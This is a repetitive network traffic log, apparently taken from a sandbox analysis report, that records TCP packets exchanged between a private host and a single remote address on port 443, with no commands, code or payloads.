Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 149.137.128.16:443 -> 192.168.2.10:49686
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
